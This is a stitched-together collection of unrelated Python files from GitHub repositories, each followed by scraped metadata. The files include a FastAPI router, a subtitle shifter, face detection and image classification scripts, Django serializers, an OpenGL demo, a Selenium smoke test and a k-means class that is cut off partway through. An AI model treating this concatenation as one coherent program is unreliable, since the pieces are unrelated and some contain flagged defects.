@router.post("/vote", status_code=status.HTTP_204_NO_CONTENT)
def answer_vote(_answer_vote: answer_schema.AnswerVote, db: Session = Depends(get_db), current_user: User = Depends(get_current_user)):
    """Register the current user's vote on an answer; 400 when it does not exist."""
    db_answer = answer_crud.get_answer(db, answer_id=_answer_vote.answer_id)
    if not db_answer:
        raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="데이터를 찾을 수 없다.")
    answer_crud.vote_answer(db, db_answer=db_answer, db_user=current_user)
answer_crud.vote_answer(db, db_answer=db_answer, db_user=current_user) | dlawnsdk/study-fastapi-project | domain/answer/answer_router.py | answer_router.py | py | 2,709 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "fastapi.APIRouter",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "domain.answer.answer_schema.AnswerCreate",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "domain.answer.answer_schema",
"line_number": 19,
"usage_type": "name"
}... |
import srt
from datetime import timedelta

# Shift subtitles START..END of INPUT by SHIFT and write the result to OUTPUT.
INPUT = "You've Got Mail (si).srt"
OUTPUT = "out.srt"
START = 1411   # 1-based index of the first subtitle to shift
END = -1       # -1 means "through the last subtitle"
SHIFT = timedelta(milliseconds=1000)

with open(INPUT) as f:
    subs = list(srt.parse(f.read()))

# Treat END == -1 as "to the end". Using -1 directly as a slice bound
# (subs[START-1:-1]) silently excluded the final subtitle from the shift.
stop = None if END == -1 else END
for sub in subs[START - 1:stop]:
    sub.start += SHIFT
    sub.end += SHIFT

with open(OUTPUT, 'w') as f:
    f.write(srt.compose(subs))
| aquiire/liyum-awith | sync.py | sync.py | py | 353 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.timedelta",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "srt.parse",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "srt.compose",
"line_number": 18,
"usage_type": "call"
}
] |
18041766413 | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 9 11:35:21 2023
@author: akava
"""
import tkinter as tk
from tkinter import ttk
from PIL import Image, ImageTk
import customtkinter, tkinter
from retinaface import RetinaFace
import cv2
from gender_classification.gender_classifier_window import GenderClassifierWindow
class SinglePhotoDetectionPage:
def __init__(self, Load, App, App_window, image1, options):
    """Build the single-photo face-detection window.

    Runs RetinaFace on *image1*, hides the loading window, and lays out a
    scrollable grid of detected face crops plus Home/Accept/Delete/Back
    buttons.
    """
    self.App = App
    self.App_window = App_window
    self.Load = Load
    self.root = customtkinter.CTkToplevel()
    self.root.title("Pagina de Deteccion de Rostros de una Sola Foto")
    self.root.geometry("800x600")  # Window size
    self.root.resizable(False, False)
    self.checkbox_vars = []
    # Hook the close event of this secondary window.
    self.root.protocol("WM_DELETE_WINDOW", self.on_closing)
    # Control flag tracking whether any image has been deleted.
    self.images_deleted = False
    self.detected_faces = RetinaFace.extract_faces(image1, align = True)
    num_personas= len(self.detected_faces)  # NOTE(review): unused local
    self.scaled_image=image1
    self.Load.withdraw()
    main_frame = customtkinter.CTkFrame(self.root, fg_color=("transparent"))
    main_frame.pack(fill=tk.BOTH, expand=True)
    # Frame for the instruction message.
    message_frame = customtkinter.CTkFrame(main_frame, fg_color=("transparent"))
    message_frame.pack(side=tk.TOP, fill=tk.X)
    # Label: "Select the photos you want to delete".
    message_label = customtkinter.CTkLabel(message_frame, text="Selecciona las fotos que deseas eliminar:", font=('Calibri', 15), fg_color="transparent", width=110)
    message_label.pack(padx=10, pady=5, anchor=tk.W)
    # Frame holding the face-crop grid.
    images_frame = customtkinter.CTkFrame(main_frame, fg_color=("transparent"))
    images_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
    # Frame holding the action buttons.
    button_frame = customtkinter.CTkFrame(main_frame, fg_color="transparent")
    button_frame.pack(side=tk.RIGHT, fill=tk.Y)
    face_count_image = customtkinter.CTkImage(Image.open("images/face.png"), size=(26, 26))
    self.face_count_label1 = customtkinter.CTkButton(button_frame, image=face_count_image, text_color="black", fg_color="transparent", text="", width=30)
    self.face_count_label1.pack(padx=10, pady=10, anchor=tk.W)
    # Navigation / action buttons.
    home_image = customtkinter.CTkImage(Image.open("images/home.png"), size=(26, 26))
    home_button = customtkinter.CTkButton(
        button_frame,
        image=home_image,
        fg_color="transparent",
        text_color= "black",
        text="Home", width=10,
        command=self.return_to_main_menu)
    home_button.pack(pady=10)
    # NOTE(review): home_button is packed twice (above and below) -- likely
    # unintentional; confirm layout before removing one.
    home_button.pack(padx=10, pady=10, anchor=tk.W)
    continue_image = customtkinter.CTkImage(Image.open("images/aceptar.png"), size=(26, 26))
    continue_button = customtkinter.CTkButton(
        button_frame,
        text="Aceptar",
        width=20,
        command=self.continue_pressed,
        image=continue_image,
        text_color="black",
        fg_color="transparent"
    )
    continue_button.pack(padx=10, pady=10, anchor=tk.W)
    delete_image = customtkinter.CTkImage(Image.open("images/borrar.png"), size=(26, 26))
    delete_button = customtkinter.CTkButton(
        button_frame,
        text="Borrar",
        width=20,
        command=self.delete_selected,
        image=delete_image,
        text_color="black",
        fg_color="transparent"
    )
    delete_button.pack(padx=10, pady=10, anchor=tk.W)
    back_image = customtkinter.CTkImage(Image.open("images/volver.png"), size=(26, 26))
    back_button = customtkinter.CTkButton(
        button_frame,
        text="Regresar",
        width=20,
        command=self.go_back,
        image=back_image,
        text_color="black",
        fg_color="transparent"
    )
    back_button.pack(padx=10, pady=10, anchor=tk.W)
    # Scrollbar for the image grid.
    scroll_y = tk.Scrollbar(images_frame, orient=tk.VERTICAL)
    scroll_y.pack(side=tk.RIGHT, fill=tk.Y)
    # Canvas hosting the scrollable image grid.
    canvas = tk.Canvas(images_frame, yscrollcommand=scroll_y.set)
    canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
    scroll_y.config(command=canvas.yview)
    # Inner frame on the canvas where the face crops are actually gridded.
    self.frame = customtkinter.CTkFrame(canvas, fg_color=("transparent"), width=650)
    canvas.create_window((0, 0), window=self.frame, anchor=tk.NW)
    self.display_detected_faces(self.frame , self.detected_faces, self.scaled_image )
    # Make the canvas scrollable over the full grid.
    canvas.update_idletasks()
    canvas.config(scrollregion=canvas.bbox("all"))
# Remove the face crops the user ticked.
def delete_selected(self):
    """Delete checked crops, flag the deletion, and refresh the grid."""
    self.detected_faces = self.delete_selected_images(self.scaled_image, self.detected_faces, self.checkbox_vars)
    # continue_pressed keys off this flag to pick the up-to-date face list.
    self.images_deleted = True
    self.display_detected_faces(self.frame, self.detected_faces, self.scaled_image)
def display_detected_faces(self, frame, detected_faces, scaled_image):
    """Rebuild the grid of face crops (6 per row), each with a checkbox.

    Also updates the face-count button text. Returns the list of
    PhotoImage objects (kept on self so Tk does not garbage-collect them).
    """
    # Clear any previously gridded widgets.
    for widget in frame.winfo_children():
        widget.destroy()
    self.face_count_label1.configure(text="Rostros: {}".format(self.count_faces(self.detected_faces)))
    # Checkbox state, one BooleanVar per crop, in grid order.
    self.checkbox_vars = []
    # Counters driving the grid placement.
    col_count = 0
    row_count = 0
    self.person_images_tk = []
    style = ttk.Style()
    style.configure('TCheckbutton', font=('Calibri', 9))
    for i, detection in enumerate(detected_faces):
        person_image = detection
        # NumPy (BGR) -> PIL (RGB).
        person_image_pil = Image.fromarray(cv2.cvtColor(person_image, cv2.COLOR_BGR2RGB))
        person_image_pil = person_image_pil.resize((150, 150), Image.LANCZOS)
        # Smaller copy actually shown in the UI.
        person_image_pil_small = person_image_pil.resize((80, 80), Image.LANCZOS)
        # Keep a reference to the full-size PhotoImage.
        person_image_tk = ImageTk.PhotoImage(person_image_pil)
        self.person_images_tk.append(person_image_tk)
        checkbox_var = tk.BooleanVar(value=False)
        self.checkbox_vars.append(checkbox_var)
        person_image_small_tk = ImageTk.PhotoImage(person_image_pil_small)
        label = customtkinter.CTkLabel(frame, image=person_image_small_tk, text="")
        checkbox = ttk.Checkbutton(frame, text="Seleccionar", variable=checkbox_var)
        # Image on one row, its checkbox on the row below.
        label.grid(row=row_count, column=col_count, padx=9, pady=5)
        checkbox.grid(row=row_count + 1, column=col_count, padx=9, pady=0)
        col_count += 1
        # NOTE(review): col_count can never be 0 right after the increment,
        # so the first branch is dead; only the >= 6 wrap is effective.
        if col_count == 0:
            row_count += 2
        elif col_count >= 6:
            col_count = 0
            row_count += 2
    return self.person_images_tk
def on_click(self, index):
    # Debug helper: log the clicked index to stdout.
    print(index)
def continue_pressed(self):
    """Hide this window and open the gender classifier with the kept faces.

    The two original branches were identical except for which detection
    list they read; deduplicated here.
    """
    # After a deletion, the current list lives in updated_detected_faces;
    # otherwise use the original detections.
    detections = (self.updated_detected_faces if self.images_deleted
                  else self.detected_faces)
    self.root.withdraw()
    faces = self.extract_faces(self.scaled_image, detections)
    app = GenderClassifierWindow(self.root, self.App, self.App_window, faces)
def count_faces(self, detected_faces):
return len(detected_faces)
def go_back(self):
    """Back button: re-show the previous (loading) window and close this one."""
    # Make the previous window visible again.
    self.Load.deiconify()
    # Close the current window.
    self.root.destroy()
def extract_faces(self, scaled_image, detected_faces):
faces = [] # Lista para almacenar los rostros extraídos
# Iterar sobre las detecciones de rostros
for detection in detected_faces:
#x1, y1, width1, height1 = detection['box']
#x1, y1, width1, height1 = int(x1), int(y1), int(width1), int(height1)
#face_roi = scaled_image[y1:y1+height1, x1:x1+width1]
#faces.append(face_roi)
faces.append(detection)
return faces
def delete_selected_images(self, scaled_image, detected_faces, checkbox_vars):
# Eliminar las imágenes seleccionadas de detected_faces
updated_detected_faces = []
for detection, checkbox_var in zip(detected_faces, checkbox_vars):
if not checkbox_var.get():
updated_detected_faces.append(detection)
self.updated_detected_faces = updated_detected_faces
return updated_detected_faces
def on_closing(self):
    """Window-close handler: restore the main window, tear down child windows."""
    # Restore the main application window.
    self.App_window.deiconify()
    # Close this page and the loading window.
    self.root.destroy()
    self.Load.destroy()
def return_to_main_menu(self):
    """Home button: restore the main window and close this page."""
    # Restore the main application window.
    self.App_window.deiconify()
    # Close this page's window.
    self.root.destroy()
self.Load.destroy() | MartinVaro/Modular | detection/single_photo_detection_page.py | single_photo_detection_page.py | py | 10,890 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "customtkinter.CTkToplevel",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "retinaface.RetinaFace.extract_faces",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "retinaface.RetinaFace",
"line_number": 31,
"usage_type": "name"
},
{
... |
28886974693 | import os
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing.image import img_to_array, load_img
from tqdm import tqdm
import json
def preprocess_image(image_path, target_size):
    """Load one image from disk as a normalized batch-of-one array.

    Returns a float array of shape (1, *target_size, channels) with pixel
    values scaled into [0, 1].
    """
    loaded = load_img(image_path, target_size=target_size)
    batch = np.expand_dims(img_to_array(loaded), axis=0)
    batch /= 255.0
    return batch
def classify_images(model_path, image_dir, target_size, output_json):
    """Classify every .jpg in *image_dir* with the saved Keras model.

    Writes [{"image_id": ..., "lesion_type": ...}, ...] to *output_json*.
    """
    model = load_model(model_path)

    # Network output index -> lesion code.
    lesion_type_mapping = {
        0: "BKL",
        1: "NV",
        2: "DF",
        3: "MEL",
        4: "VASC",
        5: "BCC",
        6: "AKIEC"
    }

    image_paths = [
        os.path.join(image_dir, name)
        for name in os.listdir(image_dir)
        if name.endswith('.jpg')
    ]
    # Preprocess each (1, H, W, C) image and stack them into one batch.
    batch = np.vstack([preprocess_image(p, target_size) for p in tqdm(image_paths)])
    predictions = model.predict(batch)

    results = []
    for path, probs in zip(image_paths, predictions):
        label = lesion_type_mapping[np.argmax(probs)]
        image_id = os.path.splitext(os.path.basename(path))[0]
        results.append({"image_id": image_id, "lesion_type": label})

    with open(output_json, 'w') as f:
        json.dump(results, f)
if __name__ == "__main__":
    # NOTE(review): absolute, user-specific paths -- adjust before running elsewhere.
    model_path = '/Users/donika/Desktop/images/model_training/model.h5'
    image_dir = '/Users/donika/Desktop/images/datasets/test'
    target_size = (128, 128)
    output_json = 'JSON.json'
    classify_images(model_path, image_dir, target_size, output_json)
| Donike98/Assignment_Solaborate | model_inference/JSON.py | JSON.py | py | 1,701 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.keras.preprocessing.image.load_img",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.preprocessing.image.img_to_array",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "numpy.expand_dims",
"line_number": 11,
"us... |
26490765888 | import base64
from rest_framework import serializers
from categories.models import Categories, Translations, Authorities
from categories.serializers import TranslationsSerializer
from users.models import User
from .models import Documents
def get_predicted_trees():
    """Return (tree_id, name) pairs for every non-deprecated root category.

    Used to populate the `predicted_trees` choice field below. Because it
    is evaluated at import time, any database error falls back to an empty
    choice list instead of crashing module import.
    """
    try:
        return Categories.objects.filter(
            deprecated=False, parent=None, level=0
        ).values_list("tree_id", "name")
    except Exception:  # deliberate best-effort: DB may be unavailable at import
        return []
class UsersSerializer(serializers.ModelSerializer):
    """Minimal user representation (username only).

    NOTE(review): duplicates UserSerializer below -- consider consolidating.
    """
    class Meta:
        model = User
        fields = ["username"]
class CategoriesSerializer(serializers.ModelSerializer):
    """Category with its Spanish translation inlined.

    NOTE(review): `authority` is declared with method_name="get_authority",
    but no `get_authority` method is defined on this serializer (nor visible
    in this file) -- serialization would fail to resolve it. Confirm and add
    the method or drop the field.
    """
    translation = serializers.SerializerMethodField()
    authority = serializers.SerializerMethodField(method_name="get_authority")

    class Meta:
        model = Categories
        exclude = ["lft", "rght", "level"]

    def get_translation(self, obj):
        # Only the Spanish ("es") translation is exposed; None when missing.
        translation = Translations.objects.filter(category=obj, language="es").first()
        if translation:
            serializer = TranslationsSerializer(translation)
            return serializer.data
        return None
class UserSerializer(serializers.ModelSerializer):
    """Minimal user representation (username only); duplicate of UsersSerializer."""
    class Meta:
        model = User
        fields = ["username"]
class DocumentsSerializer(serializers.ModelSerializer):
    """Full document representation.

    The raw PDF travels as base64 text. It is only embedded on
    single-object detail responses, and each detail fetch also increments
    the document's access counter (a write side effect of serialization).
    """
    pdf = serializers.CharField(
        max_length=None,
        style={"placeholder": "Enter the base64 of the pdf"},
    )
    img = serializers.CharField(
        max_length=None,
        style={"placeholder": "Enter the base64 of the img"},
        write_only=True,
    )
    category = serializers.SerializerMethodField()
    created_by = serializers.SerializerMethodField()
    updated_by = serializers.SerializerMethodField()
    predicted_trees = serializers.MultipleChoiceField(
        choices=get_predicted_trees(), write_only=True, required=False
    )

    class Meta:
        model = Documents
        fields = "__all__"
        read_only_fields = (
            "created_at",
            "updated_at",
            "created_by",
            "updated_by",
            "num_of_access",
        )

    def get_category(self, obj):
        # Only categories whose authority is still enabled are exposed.
        categories = obj.categories.filter(authority__disabled=False)
        if categories:
            serializer = CategoriesSerializer(categories, many=True)
            return serializer.data
        return None

    def get_created_by(self, obj):
        serializer = UserSerializer(obj.created_by)
        return serializer.data

    def get_updated_by(self, obj):
        serializer = UserSerializer(obj.updated_by)
        return serializer.data

    def to_representation(self, instance):
        representation = super().to_representation(instance)
        representation["pdf"] = None
        # Only embed the (potentially large) PDF on detail requests, i.e.
        # when the request path ends with /<id>/.
        if self.context.get("request") and self.context["request"].path.endswith(
            f"/{instance.id}/"
        ):
            # Side effect: every detail fetch bumps the access counter.
            Documents.objects.filter(id=instance.id).update(
                num_of_access=instance.num_of_access + 1
            )
            if instance.pdf:
                pdf_base64 = base64.b64encode(instance.pdf).decode("utf-8")
                representation["pdf"] = pdf_base64
        return representation
class DocumentsTextExtractorSerializer(serializers.Serializer):
    """
    Serializer for the DocumentsTextExtractor.

    Converts instances of the DocumentsTextExtractor to JSON and vice versa.

    Attributes:
        title (CharField): The base64 encoded title of the document.
        summary (CharField): The base64 encoded summary of the document.
    """

    title = serializers.CharField(
        max_length=None, style={"placeholder": "Enter the base64 for the title"}
    )
    summary = serializers.CharField(
        max_length=None, style={"placeholder": "Enter the base64 for the summary"}
    )
| JU4NP1X/teg-backend | documents/serializers.py | serializers.py | py | 3,796 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "categories.models.Categories.objects.filter",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "categories.models.Categories.objects",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "categories.models.Categories",
"line_number": 11,
"... |
29997839939 | from OpenGL.GL import *
from OpenGL.GLU import *
import sys
#from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QOpenGLWidget
from PyQt5.QtWidgets import QOpenGLWidget, QApplication, QMainWindow, QLabel, QLineEdit, QVBoxLayout, QWidget
from PyQt5.QtWidgets import QSlider
from PyQt5.QtCore import *
class MyGLWidget(QOpenGLWidget):
    """GL viewport drawing a single triangle in an adjustable RGB colour."""

    def __init__(self, parent=None):
        super(MyGLWidget, self).__init__(parent)
        # Current triangle colour components, each in 0.0..1.0.
        self.r = self.g = self.b = 0.0

    def initializeGL(self):
        # Initialize GL state once before any drawing takes place.
        glClearColor(0.8, 0.8, 0.6, 1.0)

    def resizeGL(self, width, height):
        # Configure the camera projection here.
        glMatrixMode(GL_PROJECTION)
        glLoadIdentity()

    def paintGL(self):
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        glMatrixMode(GL_MODELVIEW)
        glLoadIdentity()
        # Draw the object using the current colour and a triangle primitive.
        glColor3f(self.r, self.g, self.b)
        glBegin(GL_TRIANGLES)
        glVertex3fv([-1.0, 0.0, 0.0])
        glVertex3fv([ 1.0, 0.0, 0.0])
        glVertex3fv([ 0.0, 1.0, 0.0])
        glEnd()
        # Push the rendered framebuffer to the screen.
        glFlush()

    def setR(self, val):
        # Slider range is 0..99 -> normalize to 0.0..1.0, then repaint.
        self.r = val/99
        self.update()

    def setG(self, val):
        self.g = val/99
        self.update()

    def setB(self, val):
        self.b = val/99
        self.update()
class MyWindow(QMainWindow):
    """Main window hosting the GL widget with one slider per colour channel."""

    def __init__(self, title=''):
        super().__init__()  # idiomatic; was QMainWindow.__init__(self)
        self.setWindowTitle(title)

        self.glWidget = MyGLWidget()

        # GUI setup: GL view on top, R/G/B sliders below.
        gui_layout = QVBoxLayout()
        central_widget = QWidget()
        central_widget.setLayout(gui_layout)
        self.setCentralWidget(central_widget)

        gui_layout.addWidget(self.glWidget)

        # Connect slider signals directly to the setters; the previous
        # lambda wrappers added nothing.
        sliderX = QSlider(Qt.Horizontal)
        sliderX.valueChanged.connect(self.glWidget.setR)
        sliderY = QSlider(Qt.Horizontal)
        sliderY.valueChanged.connect(self.glWidget.setG)
        sliderZ = QSlider(Qt.Horizontal)
        sliderZ.valueChanged.connect(self.glWidget.setB)

        gui_layout.addWidget(sliderX)
        gui_layout.addWidget(sliderY)
        gui_layout.addWidget(sliderZ)
def main(argv=None):
    """Create the Qt application and run its event loop.

    *argv* defaults to None instead of a mutable list default; pass
    sys.argv to forward command-line Qt options.
    """
    app = QApplication(argv if argv is not None else [])
    window = MyWindow('GL with Qt Widgets')
    window.setFixedSize(600, 600)
    window.show()
    sys.exit(app.exec_())
if __name__ == '__main__':
main(sys.argv)
| dknife/2021Graphics | Source/01_Windowing/04_GLwQtWidgets.py | 04_GLwQtWidgets.py | py | 2,613 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "PyQt5.QtWidgets.QOpenGLWidget",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtWidgets.QMainWindow",
"line_number": 52,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtWidgets.QMainWindow.__init__",
"line_number": 55,
"usage_type": "call"
... |
25170664533 | import gspread
import pandas as pd
import numpy as np
from oauth2client.service_account import ServiceAccountCredentials
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, confusion_matrix
from flask import Flask, render_template
from datetime import datetime, timedelta
def run_script():
    """Train/evaluate a next-day S&P 500 direction model and return metrics.

    Pulls closes from the 'SP500' Google Sheet (service-account key file
    'sp500-mes-06736c615696.json' must be present), keeps the last 60 days,
    fits a RandomForest on (close, daily return), and returns accuracy,
    precision, recall, F1, the confusion matrix, and the class
    probabilities for the most recent data point.
    """
    # Authenticate and open the Google Sheet
    scope = ['https://www.googleapis.com/auth/spreadsheets', 'https://www.googleapis.com/auth/drive']
    creds = ServiceAccountCredentials.from_json_keyfile_name('sp500-mes-06736c615696.json', scope)
    client = gspread.authorize(creds)
    sheet = client.open('SP500').sheet1
    # Get the data from the sheet
    data = sheet.get_all_records()
    # Convert the data to a pandas DataFrame
    df = pd.DataFrame(data)
    # Convert the 'Date' column to a datetime object
    df['Date'] = pd.to_datetime(df['Date'])
    # Calculate the date 60 days before today
    start_date = datetime.now() - timedelta(days=60)
    # Filter the DataFrame to include only the last 60 days of data
    df = df[df['Date'] >= start_date]
    # Replace '.' (the sheet's missing-value marker) with NaN, then drop.
    df = df.replace('.', np.nan)
    df = df.dropna()
    # Calculate daily returns
    df['Return'] = df['SP500'].pct_change()
    # Label the market direction: up (+1) / down (-1) / flat (0), with a
    # +-0.1% dead band around zero.
    def label_market_direction(return_value):
        if return_value > 0.001:
            return 1
        elif return_value < -0.001:
            return -1
        else:
            return 0
    # Create a new column with the market direction labels
    df['Direction'] = df['Return'].apply(label_market_direction)
    # Shift the 'Direction' column up by one to predict the next day's direction
    df['Direction'] = df['Direction'].shift(-1)
    # Drop rows with missing values
    df = df.dropna()
    # Split the data into features (X) and target (y) variables
    X = df[['SP500', 'Return']]
    y = df['Direction']
    # Split the data into training and testing sets
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
    # Train a RandomForestClassifier
    model = RandomForestClassifier(n_estimators=100, random_state=42)
    model.fit(X_train, y_train)
    # Predict the market direction on the test set
    y_pred = model.predict(X_test)
    # Calculate the accuracy, precision, recall, and F1-score of the model
    accuracy = accuracy_score(y_test, y_pred)
    precision = precision_score(y_test, y_pred, average='weighted')
    recall = recall_score(y_test, y_pred, average='weighted')
    f1 = f1_score(y_test, y_pred, average='weighted')
    # Compute the confusion matrix.
    # NOTE(review): zip(*confusion) transposes the matrix -- confirm the
    # template expects columns, not rows.
    confusion = confusion_matrix(y_test, y_pred)
    confusion_list = list(zip(*confusion))
    # Predict the market direction for the last data point
    last_data_point = X.iloc[-1].values.reshape(1, -1)
    last_direction_prediction = model.predict(last_data_point)  # NOTE(review): unused in the return value
    # Get the class probabilities for the last data point
    confidence_values = model.predict_proba(last_data_point)
    return {
        "accuracy": accuracy,
        "precision": precision,
        "recall": recall,
        "f1_score": f1,
        "confusion_matrix": confusion_list,
        "confidence_values": confidence_values
    }
app = Flask(__name__)
@app.route('/')
def home():
    """Run the model pipeline and render its metrics on the index page."""
    results = run_script()
    pct = "{:.2%}".format
    today = datetime.now().strftime("%B %d, %Y")
    return render_template(
        'index.html',
        title=f'SP500 Prediction for next day, as of {today}',
        accuracy=pct(results["accuracy"]),
        precision=pct(results["precision"]),
        recall=pct(results["recall"]),
        f1=pct(results["f1_score"]),
        confusion_matrix=results["confusion_matrix"],
        confidence_values=results["confidence_values"],
    )
if __name__ == '__main__':
app.run(debug=True)
| Big6Ent/Predict_Next_Day_SP500_Direction | sp500_confidence.py | sp500_confidence.py | py | 4,152 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "oauth2client.service_account.ServiceAccountCredentials",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "gspread.auth... |
from RocketMilesClass import RocketMiles
import time
import logging.handlers
import datetime
import os

# Smoke test for basic functionality of the Search Results page for the
# Rocketmiles.com search app. This module contains an error logger, test
# preconditions, and TCIDs 9-10.

# Initializing the page-object wrapper (opens the browser session lazily).
RM = RocketMiles()

# --- Error logger setup ---------------------------------------------------
# Create the full log directory tree in one call. This replaces the old
# try/except-around-os.mkdir pattern, which swallowed every error and
# printed pointless blank lines.
LOG_DIR = 'logs/SearchResultsModule'
os.makedirs(LOG_DIR, exist_ok=True)

# Log file path. Name is an acronym for the module (Smoke Test Search
# Results), followed by a Year_Month_Day__HourMinute_Second timestamp.
logSuffix = datetime.datetime.now()
logName = LOG_DIR + '/STSR_log_' + logSuffix.strftime('%Y_%m_%d__%H%M_%S') + '.log'
try:
    # Touch the file so the WatchedFileHandler below has something to open.
    with open(logName, "w+"):
        pass
except OSError as err:
    print(str(err))

# Set up logging objects.
logsHandler = logging.handlers.WatchedFileHandler(os.environ.get("LOGFILE", logName))
logsFormatting = logging.Formatter(logging.BASIC_FORMAT)
logsHandler.setFormatter(logsFormatting)
root = logging.getLogger()
root.setLevel(os.environ.get("LOGLEVEL", "INFO"))
root.addHandler(logsHandler)
print("Current testing log file is: ", logName)

# --- Preconditions for proceeding with smoke test -------------------------
try:
    logging.info('Starting smoke test preconditions.')
    print('Starting smoke test preconditions.')
    RM.open_search_page()
    RM.close_cookie_banner()
    RM.loadtime()
except Exception as err:
    print(str(err))
    logging.exception(str(err))

# --- Smoke Test for Search Results (TCIDs 9-10) ---------------------------
try:
    # TCID 9: Search Page - Can a user sort results by Miles using the Sort By dialogue box?
    print('Beginning TCID 9: Search Page - Can a user sort results by Miles using the Sort By dialogue box?')
    logging.info('Beginning TCID 9: Search Page - Can a user sort results by Miles using the Sort By dialogue box?')
    RM.select_sort_by_field()
    RM.click_miles()
    RM.loadtime()
    print('TCID 9 has been executed.')
    logging.info('TCID 9 has been executed.')
    # TCID 10: Search Page - Can a user select the "Select Now" button for the first listing?
    print('Beginning TCID 10: Search Page - Can a user select the "Select Now" button for the first listing?')
    logging.info('Beginning TCID 10: Search Page - Can a user select the "Select Now" button for the first listing?')
    RM.select_hotel()
    RM.loadtime()
    print('TCID 10 has been executed.')
    logging.info('TCID 10 has been executed.')
except Exception as err:
    logging.exception(str(err))

# Ending smoke test for Search Results module.
print('Search Results module smoke test complete. Closing browser.')
RM.close_browser()
logging.info('Search Results module smoke test complete. Browser closed.')
{
"api_name": "RocketMilesClass.RocketMiles",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.mkdir",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.mkdir",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now"... |
27045433039 | import sys
import pysnooper
@pysnooper.snoop()
def lengthOfLongestSubstring(s: str) -> int:
    """Return the length of the longest substring of *s* with no repeated characters.

    Uses a sliding window with a last-seen-index map: O(len(s)) time,
    O(alphabet) space. The previous implementation re-scanned and re-sliced
    a list for every character, which was quadratic in the worst case.
    """
    last_seen = {}    # char -> index of its most recent occurrence
    window_start = 0  # left edge of the current duplicate-free window
    max_len = 0
    for i, ch in enumerate(s):
        # If ch already occurred inside the current window, slide the
        # window just past that previous occurrence.
        if ch in last_seen and last_seen[ch] >= window_start:
            window_start = last_seen[ch] + 1
        last_seen[ch] = i
        max_len = max(max_len, i - window_start + 1)
    return max_len


if __name__ == "__main__":
    max_len = lengthOfLongestSubstring(sys.argv[1])
    print(max_len)
| ikedaosushi/python-sandbox | pysnoozer/lengthOfLongestSubstring.py | lengthOfLongestSubstring.py | py | 504 | python | en | code | 11 | github-code | 36 | [
{
"api_name": "pysnooper.snoop",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 22,
"usage_type": "attribute"
}
] |
def checkCompletion(access_token, client_id):
    """Sync Wunderlist task completion into the 'wunderlist_update' sheet.

    For each sheet row whose column C is 'FALSE', fetch the corresponding
    task (id in column A) from Wunderlist; when the task is completed,
    mark column C 'TRUE' and stamp today's date into column E.

    access_token / client_id: Wunderlist API credentials.
    """
    import wunderpy2
    import pygsheets
    import datetime
    x = 2  # sheet row pointer; data starts at row 2 (row 1 is the header)
    gc = pygsheets.authorize()
    sh = gc.open('wunderlist_update')
    wks = sh.sheet1
    api = wunderpy2.WunderApi()
    client = api.get_client(access_token, client_id)
    current_rows = wks.get_all_values()
    for row_data in current_rows:
        if row_data[2] == 'TRUE':
            # Already marked complete in the sheet - nothing to do.
            x = x + 1
        if row_data[2] == 'FALSE':
            wunder_id = row_data[0]
            listo = client.get_task(task_id=wunder_id)
            # BUG FIX: the API returns a Python bool, so str() yields
            # 'True'/'False' - the old comparisons against 'TRUE'/'FALSE'
            # could never match and no row was ever updated. Normalize the
            # case before comparing. .get() guards against the key being
            # absent for incomplete tasks (presumed API behavior - verify).
            completed = str(listo.get('completed', False)).upper()
            if completed == 'FALSE':
                x = x + 1
            if completed == 'TRUE':
                date_now = datetime.datetime.now().date()
                wks.update_cell('C' + str(x), 'TRUE')
                wks.update_cell('E' + str(x), str(date_now))
                x = x + 1
{
"api_name": "pygsheets.authorize",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "wunderpy2.WunderApi",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "datetime... |
27621948392 | import time
import pandas as pd
import numpy as np
import random
from sklearn.metrics.pairwise import cosine_similarity, euclidean_distances,manhattan_distances
from sklearn.preprocessing import MinMaxScaler
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
#CLASS START=====================================================================================================================
class kmeans:
    """From-scratch k-means clustering of the MNIST test set.

    Pipeline: read file -> min-max scale -> PCA(30) -> t-SNE(2) -> iterate
    assignment/centroid steps, then write the cluster labels to CSV.
    Several distance metrics are provided; manhattan is the one in use.
    """
    def __init__(self,k):
        # k: number of clusters to fit.
        self.k = k
    #Function to read and preprocess the data
    def read_data(self):
        """Load MNIST pixels, scale, and reduce to 2-D via PCA + t-SNE.

